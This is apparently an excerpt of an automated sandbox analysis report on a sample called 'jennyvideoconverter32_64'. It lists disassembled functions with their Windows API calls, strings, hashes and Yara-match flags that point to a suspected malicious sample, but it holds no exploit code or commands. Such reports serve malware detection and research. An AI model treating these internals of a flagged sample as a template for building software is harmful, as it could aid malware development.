                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                • String ID:
                                                                                • API String ID: 1856819132-0
                                                                                • Opcode ID: 5fa3ef6237c707372226585469e17dc4d2a2dd28d15495116066a85131efa63a
                                                                                • Instruction ID: 4d788433452a9b0146499abd3f20bd4a49e24d6fe5cdaf856d30b71f3f2a2586
                                                                                • Opcode Fuzzy Hash: 5fa3ef6237c707372226585469e17dc4d2a2dd28d15495116066a85131efa63a
                                                                                • Instruction Fuzzy Hash: 65118172D04154DBDB11AFA4D808AAEFBBAFF45310F10851AE855A2360D7714E61DB91
                                                                                Function 02D82298 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D8229D
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D822B0
                                                                                • TlsGetValue.KERNEL32 ref: 02D822E7
                                                                                • TlsSetValue.KERNEL32(?), ref: 02D82300
                                                                                • TlsSetValue.KERNEL32(?,?,?), ref: 02D8231C
                                                                                  • Part of subcall function 02D82341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D82350
                                                                                  • Part of subcall function 02D82341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D82360
                                                                                  • Part of subcall function 02D82341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D82370
                                                                                  • Part of subcall function 02D82341: GetLastError.KERNEL32 ref: 02D8237A
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                • String ID:
                                                                                • API String ID: 1856819132-0
                                                                                • Opcode ID: 31084287224e075d9c8bd76beecc2f14717619e456446690ecfee69fa02ecc42
                                                                                • Instruction ID: 46a469ada0611b7c2b2ac84d51b990e7be957eb6deb15597918849ccbbcd1596
                                                                                • Opcode Fuzzy Hash: 31084287224e075d9c8bd76beecc2f14717619e456446690ecfee69fa02ecc42
                                                                                • Instruction Fuzzy Hash: 77116072D14118DBDB02AFA4D814AAEFFBAFF54310F10451AE805A3350D7714D61DF90
                                                                                Function 02D8BC45 Relevance: 7.5, APIs: 5, Instructions: 45synchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 02D8B098: __EH_prolog.LIBCMT ref: 02D8B09D
                                                                                • __CxxThrowException@8.LIBCMT ref: 02D8BC62
                                                                                  • Part of subcall function 02D9449A: RaiseException.KERNEL32(?,?,02D8FA92,?,?,?,?,?,?,?,02D8FA92,?,02DB0F78,?), ref: 02D944EF
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,02DB1D94,?,00000001), ref: 02D8BC78
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 02D8BC8B
                                                                                • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,02DB1D94,?,00000001), ref: 02D8BC9B
                                                                                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D8BCA9
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
                                                                                • String ID:
                                                                                • API String ID: 2725315915-0
                                                                                • Opcode ID: f1bba5356d05ab2a53e752f67a4d0f3495253efa165e452f9995b0864a9bc9fc
                                                                                • Instruction ID: a67384a3c81cbcd91cb4d52242b596cabd4c86bd5b32825395368c9065f3222f
                                                                                • Opcode Fuzzy Hash: f1bba5356d05ab2a53e752f67a4d0f3495253efa165e452f9995b0864a9bc9fc
                                                                                • Instruction Fuzzy Hash: 760181B6A40304AFEB10AAB4DC89F9BB7BDEB04759F104915F625D6390DB60EC059B24
                                                                                Function 02D82420 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D82432
                                                                                • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02D82445
                                                                                • RtlEnterCriticalSection.NTDLL(?), ref: 02D82454
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 02D82469
                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 02D82470
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
                                                                                • String ID:
                                                                                • API String ID: 747265849-0
                                                                                • Opcode ID: 2d001cda663109f9bb59415e9fbc51fa9a84ab59fa82543c36f1718208a29d8e
                                                                                • Instruction ID: b1a32229f16d0f997d20d9e04bd2bc7dcd855225926aa5fec2727f9148c347b8
                                                                                • Opcode Fuzzy Hash: 2d001cda663109f9bb59415e9fbc51fa9a84ab59fa82543c36f1718208a29d8e
                                                                                • Instruction Fuzzy Hash: 69F01D72641204BFE610AAA5ED4AFDAB72CFB45711FA04811F601D6680D761AD20CBB5
                                                                                Function 02D81EC7 Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InterlockedIncrement.KERNEL32(?), ref: 02D81ED2
                                                                                • PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 02D81EEA
                                                                                • RtlEnterCriticalSection.NTDLL(?), ref: 02D81EF9
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 02D81F0E
                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 02D81F15
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
                                                                                • String ID:
                                                                                • API String ID: 830998967-0
                                                                                • Opcode ID: cc02ec2bea8588469350d2c9fa75681387b718e7892db77b4c77682f3a4f84e4
                                                                                • Instruction ID: 152ca60721b80d130a49a99316393ec76d0910b24079d0a3a5c2ffe24a8f110d
                                                                                • Opcode Fuzzy Hash: cc02ec2bea8588469350d2c9fa75681387b718e7892db77b4c77682f3a4f84e4
                                                                                • Instruction Fuzzy Hash: 7BF03A72641605BBE700AFA1ED89FDABB3CFF45351F100416F60186681D775E925CBE4
                                                                                Function 02D88682 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 139COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _memmove
                                                                                • String ID: invalid string position$string too long
                                                                                • API String ID: 4104443479-4289949731
                                                                                • Opcode ID: 8326b474946b88ae90019abfb7b6de1e7552942a6dbfceb2c65b856aef94715f
                                                                                • Instruction ID: 1022436d742e6d3d64cec6356e0b6280fc0ad0a3029ed5ac298a70d147376ab6
                                                                                • Opcode Fuzzy Hash: 8326b474946b88ae90019abfb7b6de1e7552942a6dbfceb2c65b856aef94715f
                                                                                • Instruction Fuzzy Hash: E041B3313003499FD734EE69DC94A6AB7BAEB41724B80092DE896CB781C770ED04DBA4
                                                                                Function 02D830AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WSASetLastError.WS2_32(00000000), ref: 02D830C3
                                                                                • WSAStringToAddressA.WS2_32(?,?,00000000,?,?), ref: 02D83102
                                                                                • _memcmp.LIBCMT ref: 02D83141
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressErrorLastString_memcmp
                                                                                • String ID: 255.255.255.255
                                                                                • API String ID: 1618111833-2422070025
                                                                                • Opcode ID: 8d79f2de51126b540923890ff673ad800d91b81672b63aeecb1467ec9e9bdcb7
                                                                                • Instruction ID: d69b42c6ddf92224d6a6e2c4409af79ae78b1c5fd044c9cd1f9f98302ae339c0
                                                                                • Opcode Fuzzy Hash: 8d79f2de51126b540923890ff673ad800d91b81672b63aeecb1467ec9e9bdcb7
                                                                                • Instruction Fuzzy Hash: 10319371A003059FDF20AFA4C880B6EB7A6FF45B25F1085A9E86D97380DB719D45CB91
                                                                                Function 02D81F56 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D81F5B
                                                                                • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 02D81FC5
                                                                                • GetLastError.KERNEL32(?,00000000), ref: 02D81FD2
                                                                                  • Part of subcall function 02D81712: __EH_prolog.LIBCMT ref: 02D81717
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$CompletionCreateErrorLastPort
                                                                                • String ID: iocp
                                                                                • API String ID: 998023749-976528080
                                                                                • Opcode ID: 430e5e782a871af1fb7d846b38b5fef6407a07e0d7c827cf5dfa6ad8b97bb418
                                                                                • Instruction ID: 08a2ff5aff6377f97277cb6323fba0940c1e0b3e7a05d94e88daa8991627b227
                                                                                • Opcode Fuzzy Hash: 430e5e782a871af1fb7d846b38b5fef6407a07e0d7c827cf5dfa6ad8b97bb418
                                                                                • Instruction Fuzzy Hash: DC21D5B1801B449BC720DF6AD50095BFBF8FF94720B108A1FD4A683B90D7B0AA04CFA1
                                                                                Function 02D93A8F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _malloc.LIBCMT ref: 02D93AA7
                                                                                  • Part of subcall function 02D92EEC: __FF_MSGBANNER.LIBCMT ref: 02D92F03
                                                                                  • Part of subcall function 02D92EEC: __NMSG_WRITE.LIBCMT ref: 02D92F0A
                                                                                  • Part of subcall function 02D92EEC: RtlAllocateHeap.NTDLL(007A0000,00000000,00000001), ref: 02D92F2F
                                                                                • std::exception::exception.LIBCMT ref: 02D93AC5
                                                                                • __CxxThrowException@8.LIBCMT ref: 02D93ADA
                                                                                  • Part of subcall function 02D9449A: RaiseException.KERNEL32(?,?,02D8FA92,?,?,?,?,?,?,?,02D8FA92,?,02DB0F78,?), ref: 02D944EF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                • String ID: bad allocation
                                                                                • API String ID: 3074076210-2104205924
                                                                                • Opcode ID: eeca74cb39445c94933c9abc996e050d9fa17a0a88ac2a53b635477279e60c7a
                                                                                • Instruction ID: 3fc0af5942e0040ca42931255060f9bcb535105e9c6ea0a673c0cfe1747fd0fa
                                                                                • Opcode Fuzzy Hash: eeca74cb39445c94933c9abc996e050d9fa17a0a88ac2a53b635477279e60c7a
                                                                                • Instruction Fuzzy Hash: 7CE0A930A0420EAADF00EAA0CC18DAFBB6AEF01314F000595BC14A2390EB70CE04DAA0
                                                                                Function 02D837B1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D837B6
                                                                                • __localtime64.LIBCMT ref: 02D837C1
                                                                                  • Part of subcall function 02D92540: __gmtime64_s.LIBCMT ref: 02D92553
                                                                                • std::exception::exception.LIBCMT ref: 02D837D9
                                                                                  • Part of subcall function 02D92413: std::exception::_Copy_str.LIBCMT ref: 02D9242C
                                                                                  • Part of subcall function 02D8A45B: __EH_prolog.LIBCMT ref: 02D8A460
                                                                                  • Part of subcall function 02D8A45B: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02D8A46F
                                                                                  • Part of subcall function 02D8A45B: __CxxThrowException@8.LIBCMT ref: 02D8A48E
                                                                                Strings
                                                                                • could not convert calendar time to UTC time, xrefs: 02D837CE
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
                                                                                • String ID: could not convert calendar time to UTC time
                                                                                • API String ID: 1963798777-2088861013
                                                                                • Opcode ID: fbe5e03c32fe6e54e04e8b29e7d11b91b6589a3ee69c290993f8af92cae26256
                                                                                • Instruction ID: 7163a06f384587a956d7f33004a235c2fdd73ed5d3819f894d8a40f697e4ad97
                                                                                • Opcode Fuzzy Hash: fbe5e03c32fe6e54e04e8b29e7d11b91b6589a3ee69c290993f8af92cae26256
                                                                                • Instruction Fuzzy Hash: 6EE06DB1D0120AABCF00EF94E824BBEB779EB04300F404599EC25A2750EB345E0A8EA5
                                                                                Function 00403E3A Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 265memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualFree.KERNEL32(?,00008000,00004000,7622DFF0,?,00000000), ref: 00404092
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 004040ED
                                                                                • HeapFree.KERNEL32(00000000,?), ref: 004040FF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: Free$Virtual$Heap
                                                                                • String ID: -@
                                                                                • API String ID: 2016334554-2999422947
                                                                                • Opcode ID: 9c389c61e5a6cd43db9238f188d86346d40478f5c1fa1013f45f36ce2e9b1707
                                                                                • Instruction ID: d55dda63c6158a3f001c35490e62a79414290c04420ce97baa52a0c06dad31a7
                                                                                • Opcode Fuzzy Hash: 9c389c61e5a6cd43db9238f188d86346d40478f5c1fa1013f45f36ce2e9b1707
                                                                                • Instruction Fuzzy Hash: D1B16C75A00205DFDB24CF04CA90AA9BBB1FB88314F24C1AED9196F396C735EE41CB84
                                                                                Function 02D9C329 Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AdjustPointer_memmove
                                                                                • String ID:
                                                                                • API String ID: 1721217611-0
                                                                                • Opcode ID: e1dd2b6ac54bbe24592cbc10073a9c86c922558a5a35cc837f81a00cd66b5fd6
                                                                                • Instruction ID: 3f00ac930eecadd9c8830e4efa3521de9a7a9363029a2812266da3362ef15e31
                                                                                • Opcode Fuzzy Hash: e1dd2b6ac54bbe24592cbc10073a9c86c922558a5a35cc837f81a00cd66b5fd6
                                                                                • Instruction Fuzzy Hash: 4241B3363543029BEF246F64D850BBA33A6DF0A754F14441FF889863E1DB21FD80CA22
                                                                                Function 02D91260 Relevance: 6.1, APIs: 4, Instructions: 148COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02D84149), ref: 02D912FF
                                                                                  • Part of subcall function 02D83FDC: __EH_prolog.LIBCMT ref: 02D83FE1
                                                                                  • Part of subcall function 02D83FDC: CreateEventA.KERNEL32(00000000,?,?,00000000), ref: 02D83FF3
                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D912F4
                                                                                • CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,02D84149), ref: 02D91340
                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02D84149), ref: 02D91411
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle$Event$CreateH_prolog
                                                                                • String ID:
                                                                                • API String ID: 2825413587-0
                                                                                • Opcode ID: 617dc63b9b1fbad859ac0d16e221a24b1e6c7b59f61b2574d09274e79bb3e271
                                                                                • Instruction ID: bae74f943cd4849272017f6278a9388c4290a9e2a76a3b58fcdc9dd534fe7c00
                                                                                • Opcode Fuzzy Hash: 617dc63b9b1fbad859ac0d16e221a24b1e6c7b59f61b2574d09274e79bb3e271
                                                                                • Instruction Fuzzy Hash: 9F516A716006468BDF21DF28C884B9AB7F5AB88328F194628F8AD97790DB35DC05CB95
                                                                                Function 02D936F0 Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                • String ID:
                                                                                • API String ID: 2782032738-0
                                                                                • Opcode ID: 4b00bb2f2e8909ad1b25914f564552747ffa73792e7b52f6c639d3ed484d2925
                                                                                • Instruction ID: f99ff607956df160f6f72bde36a7859936e45677c9ab4f45503d55e42581232c
                                                                                • Opcode Fuzzy Hash: 4b00bb2f2e8909ad1b25914f564552747ffa73792e7b52f6c639d3ed484d2925
                                                                                • Instruction Fuzzy Hash: D541E2B5B00706ABDF988FA9C8905AA77A6EF40364B1086BDF815C7340E772DD41CB50
                                                                                Function 02D9FE55 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02D9FE8B
                                                                                • __isleadbyte_l.LIBCMT ref: 02D9FEB9
                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,00000108,?,00000000,00000000), ref: 02D9FEE7
                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,00000108,00000001,00000000,00000000), ref: 02D9FF1D
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                • String ID:
                                                                                • API String ID: 3058430110-0
                                                                                • Opcode ID: 30ef085e0597972883fe5bff83e7bc62d421ed0dfee7701e99fb8d5c893576dd
                                                                                • Instruction ID: bd4effb3476c472fe8aedcdb3e3acf30024f32c465870b4a9b07d40e92818af8
                                                                                • Opcode Fuzzy Hash: 30ef085e0597972883fe5bff83e7bc62d421ed0dfee7701e99fb8d5c893576dd
                                                                                • Instruction Fuzzy Hash: 00319C31600246AFEF218F79C844BAA7BAAFF41354F154569F868CBAE1E730DC51DB90
                                                                                Function 004047B2 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 66COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualFree.KERNEL32(FFFFFFFF,00001000,00004000,7622DFF0,?,00000000,?,-@,0040490E,00000010,00402FA3,?,?), ref: 004047F0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: FreeVirtual
                                                                                • String ID: -@$r@$r@
                                                                                • API String ID: 1263568516-1251997348
                                                                                • Opcode ID: db728298b98a3dab2ecdb4dab480861bd9016d5beafec50a15f5b98851f5bcbc
                                                                                • Instruction ID: a63ca1888fca441bf056fbcf5d5deb39584b298cc2094c54b415f4e68fc1e946
                                                                                • Opcode Fuzzy Hash: db728298b98a3dab2ecdb4dab480861bd9016d5beafec50a15f5b98851f5bcbc
                                                                                • Instruction Fuzzy Hash: EE21A1B66003419BDB20AB24DD4476633A4EB81379F24CA3BDB65B66D0D378E941CB58
                                                                                Function 02D83D7E Relevance: 6.1, APIs: 4, Instructions: 57networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • htons.WS2_32(?), ref: 02D83DA2
                                                                                  • Part of subcall function 02D83BD3: __EH_prolog.LIBCMT ref: 02D83BD8
                                                                                  • Part of subcall function 02D83BD3: std::bad_exception::bad_exception.LIBCMT ref: 02D83BED
                                                                                • htonl.WS2_32(00000000), ref: 02D83DB9
                                                                                • htonl.WS2_32(00000000), ref: 02D83DC0
                                                                                • htons.WS2_32(?), ref: 02D83DD4
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
                                                                                • String ID:
                                                                                • API String ID: 3882411702-0
                                                                                • Opcode ID: 996dc61b3ef53d79eb2f56b558d00e602a5177a077722ead19e006dce39b51b3
                                                                                • Instruction ID: 344b09f7ac92c841658670af48fd2214ac5eb1e26639ae0a9658c9bc6ad11d7e
                                                                                • Opcode Fuzzy Hash: 996dc61b3ef53d79eb2f56b558d00e602a5177a077722ead19e006dce39b51b3
                                                                                • Instruction Fuzzy Hash: DA117C75A00209EBDF01AF64D885EAAB7B9EF09710F008496FD08DF305E6719E14CBA1
                                                                                Function 02D8239D Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000), ref: 02D823D0
                                                                                • RtlEnterCriticalSection.NTDLL(?), ref: 02D823DE
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 02D82401
                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 02D82408
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                                • String ID:
                                                                                • API String ID: 4018804020-0
                                                                                • Opcode ID: 7af8bff69ba37e9ff5e66f413ce10fb6ca7777218d127a32c5ea1e611cce25c4
                                                                                • Instruction ID: a4eacb50f95c85de5b30e15a75326156c6f543186b8532c10ac175f7a26d86be
                                                                                • Opcode Fuzzy Hash: 7af8bff69ba37e9ff5e66f413ce10fb6ca7777218d127a32c5ea1e611cce25c4
                                                                                • Instruction Fuzzy Hash: 0911E171A00304ABEB10AF64C889F6ABBB9FF40704F20446DF9019B240E7B1FD11CBA0
                                                                                Function 02D9C77B Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                • String ID:
                                                                                • API String ID: 3016257755-0
                                                                                • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                • Instruction ID: 8a6651450a1a1edaac199594b57661c05987a6ad1f8319d79dd3ca57578e91d1
                                                                                • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                • Instruction Fuzzy Hash: EE01097205014ABBCF126E84CC418EE3F66BB1D358F488416FA6899231D737C9B1EB91
                                                                                Function 02D8247D Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02D824A9
                                                                                • RtlEnterCriticalSection.NTDLL(?), ref: 02D824B8
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 02D824CD
                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 02D824D4
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                                • String ID:
                                                                                • API String ID: 4018804020-0
                                                                                • Opcode ID: 3d994d7bdc313ee9066316d61e2fa16a2a3391ca382f26e4760d53a868a05c91
                                                                                • Instruction ID: 7dc270a6f24b4948ef9b63f7f9984f3ec1010c28492641e95e4d04979265a006
                                                                                • Opcode Fuzzy Hash: 3d994d7bdc313ee9066316d61e2fa16a2a3391ca382f26e4760d53a868a05c91
                                                                                • Instruction Fuzzy Hash: CCF03C72540205AFEB00AFA9E845F9ABBBCFF45711F108419FA05C6241D771E960CFA4
                                                                                Function 02D82004 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D82009
                                                                                • RtlDeleteCriticalSection.NTDLL(?), ref: 02D82028
                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D82037
                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D8204E
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
